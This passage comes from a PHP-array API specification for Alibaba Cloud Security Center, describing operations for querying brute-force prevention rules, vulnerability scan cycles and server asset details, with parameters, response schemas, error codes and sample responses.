number of alerts that are generated by Security Center.'."\n" ."\n" .'* If **From** is set to **aqs**, this parameter indicates the number of alerts that are generated by Server Guard.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Suspicious' => ['description' => 'The number of alerts that are generated by Server Guard.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeAllRegionsStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllRegionsStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAllRegionsStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"B9A68671-BD84-55CD-807A-BA3A5490FCB4\\",\\n \\"Data\\": {\\n \\"Account\\": 0,\\n \\"Vul\\": 17,\\n \\"Health\\": 2,\\n \\"Trojan\\": 1,\\n \\"NewSuspicious\\": 0,\\n \\"Suspicious\\": 2\\n }\\n}","type":"json"}]', ], 'DescribeAntiBruteForceRules' => [ 'summary' => 'Queries the brute-force attacks prevention rules that you have created.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '121.69.XX.XX', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the brute-force attacks prevention rule.'."\n" .'>You can invoke the [DescribeAntiBruteForceRules](~~DescribeAntiBruteForceRules~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1141****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query. This parameter is used for paging.', 'type' => 'string', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the brute-force attacks prevention rule.', 'type' => 'string', 'required' => false, 'example' => 'testName', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned per page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of brute-force attacks prevention rules that have been created.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Rules' => [ 'description' => 'The details of brute-force attacks prevention rules.', 'type' => 'array', 'items' => [ 'description' => 'The details of a brute-force attacks prevention rule.', 'type' => 'object', 'properties' => [ 'MachineCount' => ['description' => 'The number of servers to which the brute-force attacks prevention rule is applied.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'EnableSmartRule' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'FailCount' => ['description' => 'The threshold for the number of failed logon attempts that triggers the brute-force attacks prevention rule.', 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], 'ForbiddenTime' => ['description' => 'The duration for which the attacker IP address is disabled after the brute-force attacks prevention rule is triggered. Unit: minutes.', 'type' => 'integer', 'format' => 'int32', 'example' => '360', 'title' => ''], 'Span' => ['description' => 'The time threshold within which the brute-force attacks prevention rule takes effect. Unit: minutes. For example, if **Span** is set to 10, the brute-force attacks prevention rule is triggered and blocks logon attempts for the specified duration when the number of failed logon attempts within 10 minutes exceeds the settings threshold.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'DefaultRule' => ['description' => 'Indicates whether the current rule is the default rule. Valid values:'."\n" .'- **true**: The rule is the default rule.'."\n" .'- **false**: The rule is not the default rule.'."\n" ."\n" .'> A brute-force attacks prevention rule that is configured as the default rule takes effect on all servers that do not have a prevention rule configured. See Settings for more information.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Name' => ['description' => 'The name of the brute-force attacks prevention rule.', 'type' => 'string', 'example' => 'AntiBruteForceRule01', 'title' => ''], 'Id' => ['description' => 'The ID of the brute-force attacks prevention rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '1629', 'title' => ''], 'UuidList' => [ 'description' => 'The list of UUIDs of the servers to which the brute-force attacks prevention rule is applied.', 'type' => 'array', 'items' => ['description' => 'The UUID of a server to which the brute-force attacks prevention rule is applied.', 'type' => 'string', 'example' => 'uuid-018c-4ef7-89fd-988b9b0e****', 'title' => ''], 'title' => '', 'example' => '', ], 'CreateTimestamp' => ['description' => 'The UNIX timestamp when the brute-force attacks prevention rule was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1669800181000', 'title' => ''], 'ProtocolType' => [ 'description' => 'The protocol types that the brute-force attacks prevention rule supports for interception.', 'type' => 'object', 'properties' => [ 'Rdp' => ['description' => 'The RDP interception mode. Valid values:'."\n" .' - **on**: enabled'."\n" .' - **off**: disabled.', 'type' => 'string', 'example' => 'on', 'title' => ''], 'Ssh' => ['description' => 'The SSH interception mode. Valid values:'."\n" .' - **on**: enabled'."\n" .' - **off**: disabled.', 'type' => 'string', 'example' => 'on', 'title' => ''], 'SqlServer' => ['description' => 'The SqlServer interception mode. Valid values:'."\n" .' - **on**: enabled'."\n" .' - **off**: disabled.', 'type' => 'string', 'example' => 'off', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query brute-force attacks prevention rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAntiBruteForceRules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAntiBruteForceRules', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AntiBruteForceRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:antibruteforcerule/{#AntiBruteForceRuleId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2\\n },\\n \\"Rules\\": [\\n {\\n \\"MachineCount\\": 3,\\n \\"EnableSmartRule\\": false,\\n \\"FailCount\\": 15,\\n \\"ForbiddenTime\\": 360,\\n \\"Span\\": 10,\\n \\"DefaultRule\\": true,\\n \\"Name\\": \\"AntiBruteForceRule01\\",\\n \\"Id\\": 1629,\\n \\"UuidList\\": [\\n \\"uuid-018c-4ef7-89fd-988b9b0e****\\"\\n ],\\n \\"CreateTimestamp\\": 1669800181000,\\n \\"ProtocolType\\": {\\n \\"Rdp\\": \\"on\\",\\n \\"Ssh\\": \\"on\\",\\n \\"SqlServer\\": \\"off\\"\\n }\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAppVulScanCycle' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Cycle' => ['description' => 'The application vulnerability scanning epoch. Valid values:'."\n" ."\n" .'- 1week'."\n" .'- 2weeks'."\n" .'- 3days', 'type' => 'string', 'example' => '1week', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '934E6D2A-0123-5A99-88BA-80DC27634E22', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query application vulnerability scanning epoch', 'summary' => 'Queries the application vulnerability scanning epoch.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAppVulScanCycle'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAppVulScanCycle', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Cycle\\": \\"1week\\",\\n \\"RequestId\\": \\"934E6D2A-0123-5A99-88BA-80DC27634E22\\"\\n}","type":"json"}]', ], 'DescribeAssetDetailByUuid' => [ 'summary' => 'Queries the details and extended information of a server asset by UUID.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '91990', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.0.XX.XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset that you want to query.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '9e6cad93-a379-46fd-a701-9bbf02f4****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '39031E31-6BBA-5C99-A870-D807E78918CD', 'title' => ''], 'AssetDetail' => [ 'description' => 'The asset details.', 'type' => 'object', 'properties' => [ 'CpuInfo' => ['description' => 'The CPU details.', 'type' => 'string', 'example' => 'Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'OsDetail' => ['description' => 'The operating system version and architecture of the server.', 'type' => 'string', 'example' => 'Linux 64bit', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when Security Center recorded the asset information, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1603863599000', 'title' => ''], 'Kernel' => ['description' => 'The kernel version of the operating system.', 'type' => 'string', 'example' => '4.18.0-80.11.2.el8_0.x86_64', 'title' => ''], 'Bind' => ['description' => 'Indicates whether the asset is bound to an authorization. Valid values:'."\n" ."\n" .'- **true**: The asset is bound to an authorization.'."\n" .'- **false**: The asset is not bound to an authorization.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'OsName' => ['description' => 'The operating system name of the server.', 'type' => 'string', 'example' => '-', 'title' => ''], 'Tag' => ['description' => 'The tag of the server.', 'type' => 'string', 'example' => 'InternetIp', 'title' => ''], 'ClientStatus' => ['description' => 'The status of the China China agent client. Valid values: '."\n" .'- **pause**: Protection paused.'."\n" .'- **online**: Protected.'."\n" .'- **offline**: Not protected.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'Mem' => ['description' => 'The memory size, in GB.', 'type' => 'integer', 'format' => 'int32', 'example' => '32', 'title' => ''], 'Memory' => ['description' => 'The memory size, in MB.', 'type' => 'integer', 'format' => 'int64', 'example' => '512', 'title' => ''], 'VpcInstanceId' => ['description' => 'The ID of the VPC instance where the server resides.', 'type' => 'string', 'example' => 'vpc-bp1fs3bwonlfq503w****', 'title' => ''], 'AuthVersion' => ['description' => 'The authorization version of the asset. Valid values:'."\n" ."\n" .'- **1**: Free Edition (unauthorized).'."\n" .'- **6**: Anti-virus Edition.'."\n" .'- **5**: Advanced Edition.'."\n" .'- **3**: Enterprise Edition.'."\n" .'- **7**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'i-fasdfasdfadfafa****', 'title' => ''], 'Region' => ['description' => 'The region where the server resides.', 'type' => 'string', 'example' => 'cn-hangzhou-dg-a01', 'title' => ''], 'GroupTrace' => ['description' => 'The group to which the server belongs. Servers that are not assigned to a group belong to the **Ungrouped** group by default.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'Ip' => ['description' => 'The IP address assigned by ECS.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'HostName' => ['description' => 'The hostname.', 'type' => 'string', 'example' => 'qewrqwerqs****', 'title' => ''], 'Os' => ['description' => 'The operating system type of the server.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'AuthModifyTime' => ['description' => 'The timestamp when the asset authorization was bound, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1627974044000', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server.', 'type' => 'string', 'example' => 'i-uf6h7p2fgk6rkk0g****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'AssetType' => ['description' => 'The asset type. Valid values: '."\n" .'- **0**: Elastic Compute Service (ECS) server.'."\n" .'- **1**: Server Load Balancer (SLB).'."\n" .'- **2**: NAT gateway.'."\n" .'- **3**: ApsaraDB RDS database.'."\n" .'- **4**: MongoDB database.'."\n" .'- **5**: Redis database.'."\n" .'- **6**: container image.'."\n" .'- **7**: container.', 'type' => 'string', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the asset.', 'type' => 'string', 'example' => 'cn-hanghzou', 'title' => ''], 'SysInfo' => ['description' => 'The operating system information of the server.', 'type' => 'string', 'example' => 'CentOS Linux 8.0.1905', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '9e6cad93-a379-46fd-a701-9bbf02f4****', 'title' => ''], 'Cpu' => ['description' => 'The number of CPU cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RegionName' => ['description' => 'The name of the region where the server resides.', 'type' => 'string', 'example' => 'China (Hohhot)', 'title' => ''], 'Flag' => ['description' => 'Indicates whether the asset is an Alibaba Cloud asset. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset.'."\n" .'- **1**: Non-Alibaba Cloud asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ClientVersion' => ['description' => 'The version of the agent client.', 'type' => 'string', 'example' => '2.0.0', 'title' => ''], 'IpList' => [ 'description' => 'The list of IP addresses of the server.', 'type' => 'array', 'items' => ['description' => 'The list of IP addresses of the server.', 'type' => 'string', 'example' => '["192.168.XX.XX"]', 'title' => ''], 'title' => '', 'example' => '', ], 'MacList' => [ 'description' => 'The MAC addresses.', 'type' => 'array', 'items' => ['description' => 'The MAC addresses.', 'type' => 'string', 'example' => '['."\n" .' "00:16:3*:1*:9*:cf"'."\n" .']', 'title' => ''], 'title' => '', 'example' => '', ], 'DiskInfoList' => [ 'description' => 'The collection of disk information.', 'type' => 'array', 'items' => ['description' => 'The disk information. The following parameters describe the disk:'."\n" .'- **diskName**: the disk name.'."\n" .'- **totalSize**: the total disk capacity, in GB.'."\n" .'- **useSize**: the used disk capacity, in GB.'."\n" .'- **useSizeByte**: the used disk capacity, in bytes.'."\n" .'- **totalSizeByte**: the total disk capacity, in bytes.', 'type' => 'string', 'example' => '{diskName: "/dev/vda1", useSizeByte: 2998996992, totalSize: 40, useSize: 2, totalSizeByte: 42140479488}', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::GetAssetDetailByUuid'], ], 'title' => 'Query server asset details and extended information', 'description' => 'This operation is about to be deprecated. Call the [GetAssetDetailByUuid](~~GetAssetDetailByUuid~~) operation to obtain asset details.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetDetailByUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAssetDetailByUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"39031E31-6BBA-5C99-A870-D807E78918CD\\",\\n \\"AssetDetail\\": {\\n \\"CpuInfo\\": \\"Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz\\",\\n \\"InternetIp\\": \\"192.168.XX.XX\\",\\n \\"OsDetail\\": \\"Linux 64bit\\",\\n \\"CreateTime\\": 1603863599000,\\n \\"Kernel\\": \\"4.18.0-80.11.2.el8_0.x86_64\\",\\n \\"Bind\\": true,\\n \\"OsName\\": \\"-\\",\\n \\"Tag\\": \\"InternetIp\\",\\n \\"ClientStatus\\": \\"online\\",\\n \\"Mem\\": 32,\\n \\"Memory\\": 512,\\n \\"VpcInstanceId\\": \\"vpc-bp1fs3bwonlfq503w****\\",\\n \\"AuthVersion\\": 7,\\n \\"InstanceName\\": \\"i-fasdfasdfadfafa****\\",\\n \\"Region\\": \\"cn-hangzhou-dg-a01\\",\\n \\"GroupTrace\\": \\"default\\",\\n \\"Ip\\": \\"192.168.XX.XX\\",\\n \\"HostName\\": \\"qewrqwerqs****\\",\\n \\"Os\\": \\"linux\\",\\n \\"AuthModifyTime\\": 1627974044000,\\n \\"InstanceId\\": \\"i-uf6h7p2fgk6rkk0g****\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"AssetType\\": \\"0\\",\\n \\"RegionId\\": \\"cn-hanghzou\\",\\n \\"SysInfo\\": \\"CentOS Linux 8.0.1905\\",\\n \\"Uuid\\": \\"9e6cad93-a379-46fd-a701-9bbf02f4****\\",\\n \\"Cpu\\": 2,\\n \\"RegionName\\": \\"China (Hohhot)\\",\\n \\"Flag\\": 0,\\n \\"ClientVersion\\": \\"2.0.0\\",\\n \\"IpList\\": [\\n \\"[\\\\\\"192.168.XX.XX\\\\\\"]\\"\\n ],\\n \\"MacList\\": [\\n \\"[\\\\n \\\\\\"00:16:3*:1*:9*:cf\\\\\\"\\\\n]\\"\\n ],\\n \\"DiskInfoList\\": [\\n \\"{diskName: \\\\\\"/dev/vda1\\\\\\", useSizeByte: 2998996992, totalSize: 40, useSize: 2, totalSizeByte: 42140479488}\\"\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeAssetDetailByUuids' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '91991', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the asset instances. Separate multiple UUIDs with commas (,).'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '0687b17f-2a36-4e5****,0687b17f-2a36-4e****'."\n", 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource folder.'."\n" .'>Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '92016EC8-D52D-49D8-9FF7-9EA340A950B9', 'title' => ''], 'AssetList' => [ 'description' => 'The list of asset details.', 'type' => 'array', 'items' => [ 'description' => 'The asset details.', 'type' => 'object', 'properties' => [ 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '10.10.XX.XX', 'title' => ''], 'OsName' => ['description' => 'The name of the operating system of the server asset.', 'type' => 'string', 'example' => 'CentOS 7.6 64位', 'title' => ''], 'Ip' => ['description' => 'The IP address of the server.'."\n" ."\n" .'> If a public IP address exists, this value is the public IP address. If no public IP address exists but a private IP address exists, this value is the private IP address.', 'type' => 'string', 'example' => '10.10.XX.XX', 'title' => ''], 'Os' => ['description' => 'The operating system type of the server.', 'type' => 'string', 'example' => 'Linux', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'example' => 'i-rj9gda4wolo0zixi****', 'title' => ''], 'ClientStatus' => ['description' => 'The status of the China China China agent client. Valid values:'."\n" .'- **online**: online'."\n" .'- **offline**: offline.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'VpcInstanceId' => ['description' => 'The VPC-connected instance ID.', 'type' => 'string', 'example' => '13231-331331', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'AssetType' => ['description' => 'The type of the asset.'."\n" ."\n" .'The only valid value is **0**, which indicates an ECS instance.', 'type' => 'string', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The region in which the server resides.'."\n" .'> For the mapping between region IDs and region names, see [Regions and zones](~~40654~~).', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset.', 'type' => 'string', 'example' => '2a98f149-0256-414c-a29a-a69f8a75****', 'title' => ''], 'Flag' => ['description' => 'The asset vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: asset outside the cloud'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: third-party cloud asset'."\n" .'- **8**: lightweight asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RegionName' => ['description' => 'The name of the region in which the server resides.', 'type' => 'string', 'example' => 'cn-shenzhen', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset.', 'type' => 'string', 'example' => 'TestInstanceName', 'title' => ''], 'Region' => ['description' => 'The region in which the server resides.', 'type' => 'string', 'example' => 'cn-guangzhou', 'title' => ''], 'CpuInfo' => ['description' => 'The CPU details.', 'type' => 'string', 'example' => 'Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz', 'title' => ''], 'OsDetail' => ['description' => 'The operating system version and architecture of the server.', 'type' => 'string', 'example' => 'Linux 64bit', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when Security Center recorded the asset information. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1603863599000', 'title' => ''], 'Kernel' => ['description' => 'The Milvus version of the operating system kernel.', 'type' => 'string', 'example' => '4.18.0-80.11.2.el8_0.x86_64', 'title' => ''], 'Bind' => ['description' => 'Indicates whether the asset is bound to an authorization. Valid values:'."\n" ."\n" .'- **true**: bound to an authorization'."\n" .'- **false**: not bound to an authorization.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Tag' => ['description' => 'The tag of the server.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'Mem' => ['description' => 'The memory size. Unit: GB.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'Memory' => ['description' => 'The memory size. Unit: MB.', 'type' => 'integer', 'format' => 'int64', 'example' => '1024', 'title' => ''], 'AuthVersion' => ['description' => 'The authorization version of the asset. Valid values:'."\n" ."\n" .'- **1**: Free Edition (unauthorized)'."\n" .'- **6**: Anti-virus Edition'."\n" .'- **5**: Advanced Edition'."\n" .'- **3**: Enterprise Edition'."\n" .'- **7**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'GroupTrace' => ['description' => 'The group to which the server belongs. Servers that are not assigned to a group belong to the **Ungrouped** group by default.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'HostName' => ['description' => 'The hostname.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'AuthModifyTime' => ['description' => 'The timestamp when the asset authorization was bound. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1627974044000', 'title' => ''], 'SysInfo' => ['description' => 'The operating system information of the server.', 'type' => 'string', 'example' => 'CentOS Linux 8.0.1905', 'title' => ''], 'Cpu' => ['description' => 'The number of CPU cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'ClientVersion' => ['description' => 'The version of the agent client.', 'type' => 'string', 'example' => '2.0.0', 'title' => ''], 'IpList' => [ 'description' => 'The list of IP addresses of the server.', 'type' => 'array', 'items' => ['description' => 'The IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'title' => '', 'example' => '', ], 'MacList' => [ 'description' => 'The list of MAC addresses.', 'type' => 'array', 'items' => ['description' => 'The MAC address.', 'type' => 'string', 'example' => '00:16:3*:1*:9*:cf', 'title' => ''], 'title' => '', 'example' => '', ], 'DiskInfoList' => [ 'description' => 'The list of disk information.', 'type' => 'array', 'items' => ['description' => 'The disk information. The following parameters describe the disk:'."\n" .'- **diskName**: the disk name.'."\n" .'- **totalSize**: the total disk capacity. Unit: GB.'."\n" .'- **useSize**: the used disk capacity. Unit: GB.'."\n" .'- **useSizeByte**: the used disk capacity. Unit: bytes.'."\n" .'- **totalSizeByte**: the total disk capacity. Unit: bytes.', 'type' => 'string', 'example' => '{diskName: "/dev/vda1", useSizeByte: 2998996992, totalSize: 40, useSize: 2, totalSizeByte: 42140479488}', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 